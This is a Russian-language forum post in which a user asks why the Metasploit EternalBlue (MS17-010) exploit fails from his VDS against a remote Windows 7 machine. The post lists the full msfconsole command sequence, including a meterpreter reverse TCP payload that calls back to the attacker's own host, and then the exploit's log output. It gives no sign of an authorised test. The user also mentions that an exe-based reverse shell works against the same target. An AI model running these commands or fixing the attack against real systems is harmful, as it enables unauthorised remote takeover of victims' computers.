• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Проблема Не получается реализовать Eternalblue(ms17_010) из Linux.

M

mrjbom

Member
31.07.2018
6
0
Здравствуйте, пользователи форума.
Пытаюсь провести атаку Eternalblue с моего VDS.
Буду краток.
sudo ./msfconsole
use exploit/windows/smb/ms17_010_eternalblue

set payload windows/meterpreter/reverse_tcp(пробовал с windows/x64/meterpreter/reverce_tcp)
set LPORT 7775
set LHOST *public dns*
set RHOSTS *ip атакуемой машины*
run

[*] Started reverse TCP handler on мой ip:7775
[*] ip атакуемой машины:445 - Connecting to target for exploitation.
[+] ip атакуемой машины:445 - Connection established for exploitation.
[+] ip атакуемой машины:445 - Target OS selected valid for OS indicated by SMB reply
[*] ip атакуемой машины:445 - CORE raw buffer dump (42 bytes)
[*] ip атакуемой машины:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] ip атакуемой машины:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] ip атакуемой машины:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] ip атакуемой машины:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] ip атакуемой машины:445 - Trying exploit with 12 Groom Allocations.
[*] ip атакуемой машины:445 - Sending all but last fragment of exploit packet
[*] ip атакуемой машины:445 - Starting non-paged pool grooming
[+] ip атакуемой машины:445 - Sending SMBv2 buffers
[+] ip атакуемой машины:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] ip атакуемой машины:445 - Sending final SMBv2 buffers.
[*] ip атакуемой машины:445 - Sending last fragment of exploit packet!
[*] ip атакуемой машины:445 - Receiving response from exploit packet
[-] ip атакуемой машины:445 - Did not receive a response from exploit packet
[*] ip атакуемой машины:445 - Sending egg to corrupted connection.
[-] ip атакуемой машины:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.

А вот если проводить обычную атаку посредством exe файла и meterpreter/reverce_tcp то всё в порядке.
В чём проблема?
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб